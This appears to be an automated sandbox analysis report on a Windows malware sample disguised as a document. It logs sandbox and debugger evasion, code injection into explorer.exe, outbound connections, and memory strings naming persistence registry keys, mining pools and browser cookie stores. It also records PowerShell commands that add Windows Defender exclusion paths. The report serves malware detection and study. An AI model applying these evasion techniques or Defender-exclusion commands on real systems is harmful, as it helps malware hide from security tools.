Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Window / User API: threadDelayed 650
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Window / User API: threadDelayed 635
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Window / User API: threadDelayed 621
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5772
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 476
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6849
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 508

Source: C:\Windows\SysWOW64\explorer.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe TID: 2964	Thread sleep time: -66500s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5764	Thread sleep time: -36000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 204	Thread sleep time: -1380000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4624	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6012	Thread sleep count: 742 > 30
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6012	Thread sleep time: -44520s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4328	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4532	Thread sleep count: 765 > 30
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4532	Thread sleep time: -45900s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6008	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 996	Thread sleep count: 749 > 30
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 996	Thread sleep time: -44940s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4860	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 2212	Thread sleep count: 742 > 30
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 2212	Thread sleep time: -44520s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6408	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6392	Thread sleep count: 704 > 30
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6392	Thread sleep time: -42240s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6456	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6416	Thread sleep count: 697 > 30
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6416	Thread sleep time: -41820s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6532	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6460	Thread sleep count: 689 > 30
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6460	Thread sleep time: -41340s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6632	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6588	Thread sleep time: -40260s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6724	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6672	Thread sleep count: 658 > 30
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6672	Thread sleep time: -39480s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6956	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6852	Thread sleep count: 650 > 30
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6852	Thread sleep time: -39000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7120	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7032	Thread sleep count: 635 > 30
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7032	Thread sleep time: -38100s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 980	Thread sleep time: -660000s >= -30000s
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7140	Thread sleep count: 621 > 30
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7140	Thread sleep time: -37260s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6760	Thread sleep count: 5772 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5380	Thread sleep count: 476 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6360	Thread sleep count: 6849 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6056	Thread sleep count: 508 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6616	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Code function: 1_2_00429762 GetSystemInfo,

Source: 9sek3aw7533q9.exe, 0000000E.00000002.266245612.0000000000769000.00000004.00000020.sdmp	Binary or memory string: \\.\HGFSl(
Source: 9sek3aw7533q9.exe, 00000015.00000002.281169894.0000000000730000.00000004.00000020.sdmp	Binary or memory string: \??\HGFS
Source: powershell.exe, 00000025.00000002.359390441.00000248FFB60000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp	Binary or memory string: Software\VMware, Inc.
Source: 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp	Binary or memory string: Starttooltips_class32%c:\usb20.sys%c:\*pp.exe%c:\%s%c:\pp.exe.lnk%WinDir%\explorer.exe /C start /d. %s&"%s"%COMSPEC%%WinDir%\system32\shell32.dll%c:\%s.lnk{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}VisthAux.exesnxhk.dllSOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceSOFTWARE\Classes\originjagexcacheSOFTWARE\Blizzard Entertainment.minecraftLeague of LegendsSoftware\SkypeSoftware\Microsoft\VisualStudioSoftware\VMware, Inc.SOFTWARE\AdwCleanerSOFTWARE\Safer Networking Limited\Spybot - Search & Destroy 2Software\Classes\VirtualStore\MACHINE\SOFTWARE\TrendMicro\HijackThisComboFixLinhaDefensivaHouseCallLanguageSoftware\Valve\SteamMRU0Software\Microsoft\Terminal Server Client\Default%08x:\nortonsymantecsecurityantivirustest_uac_1.exesetup.exerunonce.exe__restartWmiPrvSE.execomctl32.dllGetAddrInfoWGetAddrInfoExWwintrust.dllWinVerifyTrustNtOpenProcessNtCreateFileNtOpenFileNtSetValueKeyNtDeleteValueKeySOFTWARESYSTEM\CurrentControlSet\servicesEnableLUASOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Systemcmd.exe /c start "" "%s" "" DisableSRSOFTWARE\Policies\Microsoft\Windows NT\SystemRestoremrtstub.exe"%s"VersionCheckEnabledSoftware\Microsoft\Windows\CurrentVersion\Policies\ExtEnableJavaUpdateSOFTWARE\JavaSoft\Java Update\PolicySOFTWARE\Wow6432Node\JavaSoft\Java Update\PolicyiCheckReaderSOFTWARE\Adobe\Adobe ARM\1.0\ARMSOFTWARE\Wow6432Node\Adobe\Adobe ARM\1.0\ARMDisableWindowsUpdateAccessSoftware\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdateEnableBalloonTipsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedEnableSmartScreenSOFTWARE\Policies\Microsoft\Windows\SystemSmartScreenEnabledSOFTWARE\Microsoft\Windows\CurrentVersion\ExplorerOff%S\%S\%S\%pgoogle.comwindowsupdate.microsoft.commicrosoft.comupdate.microsoft.comwinmgr108.exemsiexec.exewuauclt.exesvchost.exestratum-ubtcguildpool.itzod.rubitcoinpool.compool0.btcdig.comtriplemining.com.bitparking.commining.eligius.st.bitcoin.czmint.bitminter.compool_addresstcp://-pscryptsha256solid-a http-t @-x socks=wscript.execscript.exevbc.exerundll32.exeregsvr32.exe%ALLUSERSPROFILE%SOFTWARE\Microsoft\CurrentVersion\RunSOFTWARE\Microsoft\CurrentVersion\RunOnceSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunSystemcsrss.exelsass.exesmss.exewinlogon.exeservices.exekernel32.dll.ini.sys%s\%08x.lnk\regsvr32.exe\rundll32.exe\wscript.exe\cscript.exewscript.exe / cscript.exe wscript ~explorer.exedesktop.ini javascript:\mshtml,<script>%08xSOFTWARE\Microsoft\Windows NT\CurrentVersion\WindowsLoadWinlogonSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon ,{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}{2faba4c7-4da9-4013-9697-20cc3fd40f85}\CLSID\%S\InprocServer32Wow6432Node\CLSID\%S\InprocServer32Software\Microsoft\Windows\CurrentVersion\Ext\SettingsP: %u // RPE: %u // T: %u // F: %u // MNR: %u // AS: %u // BHO: %u // // vAntiBot() :: Abruptly exited due to update task%s%s_%p%08x%08x%08x%08xSoftware\AppDataLow\Software\%s\%08XSoftware\AppDataLow\Software\%s\%08X\%s.rdatachrome.dllPOSTposthttpHTTP
Source: 9sek3aw7533q9.exe, 00000015.00000002.281151249.0000000000723000.00000004.00000020.sdmp	Binary or memory string: \??\VBoxGuestq
Source: 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp	Binary or memory string: SbieDll.dllapi_log.dlldir_watch.dll%02XEVERYONECURRENT_USER0x%08XSB:0x%08XG:%s_0x%08X_%c:%s_v1$G:%S_0x%08XOPENmscoree.dllSoftware\Microsoft\Internet Explorer\MainSoftware\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u2500IsolationPMILNoProtectedModeBanneryesCheck_AssociationsSOFTWARE\Microsoft\Internet Explorer\MainIEXPLORE.EXESOFTWARE\Clients\StartMenuInternetIE.HTTPProgidSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoiceIE.HTTPSSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoiceIE.AssocFile.HTMchrome.exefirefox.exeopera.exesafari.exe360browser.exemaxthon.exesvcVersionSOFTWARE\Microsoft\Internet ExplorerVersionCurrentVersionSoftware\Mozilla\Mozilla FirefoxHTTP\shell\open\commandStart PageApplications\iexplore.exe\shell\open\commandiex(x86)%s\Internet Explorer\iexplore.exeSoftware\Microsoft\Windows\CurrentVersion\Ext\Settings\%sFlagscookie:Mozilla\Firefox\Profilescookies.sqliteErp~dcen7Zxy~cxe7:7Dnd~ycreyv{d-7```9dnd~ycreyv{d9txzX[[NSUPDxqc`verK^zzby~cn7^ytPZREZxy~cxe~yp7:7VG^7Zxy~cxe7a%7$%:u~cGEXTZXYH@^YSX@HT[VDDC^sv@~ysx`DNDCRZKTxycex{Drc''&Kdrea~trdKS~d\|KRybzaz`verauxoDNDCRZKTbeerycTxycex{DrcKdrea~trdKAZ`verDXQC@VERKAZ`ver;7^yt90Libraryindotaskmgr.exeprocexp.exe\DesktopDocuments%s\winsxs\x86_microsoft.windows.common-controls_6.0._*%s\winsxs\%s\comctl32.dllK32GetMappedFileNameWPsapi.dllGetMappedFileNameWSystemManufacturerHARDWARE\DESCRIPTION\System\BIOSvMwARSystemBiosVersionHARDWARE\DESCRIPTION\SystemvBoXdriversvboxvideo.sysvboxguest.sysvmhgfs.sysprl_boot.sysJJ8J^QPEJJ8J@TynQcsebcmd.exeProcessorNameStringHARDWARE\DESCRIPTION\System\CentralProcessor\0dg_ssudbusApple Mobile DeviceSOFTWARE\Microsoft\Windows NT\CurrentVersion%s\%sdeployment.security.level=MEDIUM
Source: 9sek3aw7533q9.exe, 0000000E.00000002.266268374.0000000000783000.00000004.00000020.sdmp	Binary or memory string: \??\VBoxGuests8
Source: CpSHySoEfzH.exe	Binary or memory string: vmhgfs.sys
Source: powershell.exe, 00000025.00000002.359390441.00000248FFB60000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: CpSHySoEfzH.exe	Binary or memory string: vboxguest.sys
Source: 9sek3aw7533q9.exe, 0000000E.00000002.266268374.0000000000783000.00000004.00000020.sdmp	Binary or memory string: \\.\VBoxGuest
Source: 9sek3aw7533q9.exe, 00000015.00000002.281151249.0000000000723000.00000004.00000020.sdmp	Binary or memory string: \\.\VBoxGuestK
Source: powershell.exe, 00000025.00000002.359390441.00000248FFB60000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: 9sek3aw7533q9.exe, 0000000E.00000002.266278280.0000000000790000.00000004.00000020.sdmp	Binary or memory string: \??\HGFS%3o
Source: 9sek3aw7533q9.exe, 00000015.00000002.281122874.0000000000709000.00000004.00000020.sdmp	Binary or memory string: \\.\HGFSl]
Source: 9sek3aw7533q9.exe, 0000000E.00000002.266278280.0000000000790000.00000004.00000020.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281169894.0000000000730000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000025.00000002.359390441.00000248FFB60000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\explorer.exe

Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\explorer.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Thread information set: HideFromDebugger
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Thread information set: HideFromDebugger
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Thread information set: HideFromDebugger
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Show sources

Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Open window title or class name: procmon_window_class
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Open window title or class name: tidawindow
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Open window title or class name: monitoring - api monitor v2 32-bit
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Open window title or class name: ollydbg

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process queried: DebugPort
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process queried: DebugPort
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process queried: DebugPort
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process queried: DebugPort
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process queried: DebugPort
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process queried: DebugPort
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process queried: DebugPort
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Code function: 2_2_027E2AFC LdrInitializeThunk,

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: 2_2_004015C6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: 2_2_004015C6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: 2_2_00401BC1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: 2_1_004015C6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: 2_1_004015C6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: 2_1_00401BC1 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Code function: 1_2_0042935C GetProcessHeap,

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\explorer.exe	Process token adjusted: Debug
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process token adjusted: Debug
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process token adjusted: Debug
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: 2_2_004015C6 EntryPoint,SetErrorMode,SetUnhandledExceptionFilter,GetModuleFileNameW,WaitForSingleObjectEx,ExitProcess,
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: 2_1_004015C6 EntryPoint,SetErrorMode,SetUnhandledExceptionFilter,GetModuleFileNameW,WaitForSingleObjectEx,ExitProcess,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 8.210.47.214 80
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 104.21.55.228 187
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 212.114.52.43 80

Adds a directory exclusion to Windows Defender

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'

Contains functionality to inject code into remote processes

Show sources

Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Memory written: C:\Users\user\Desktop\Documento--SII--33875.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Memory written: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Memory written: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Memory written: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
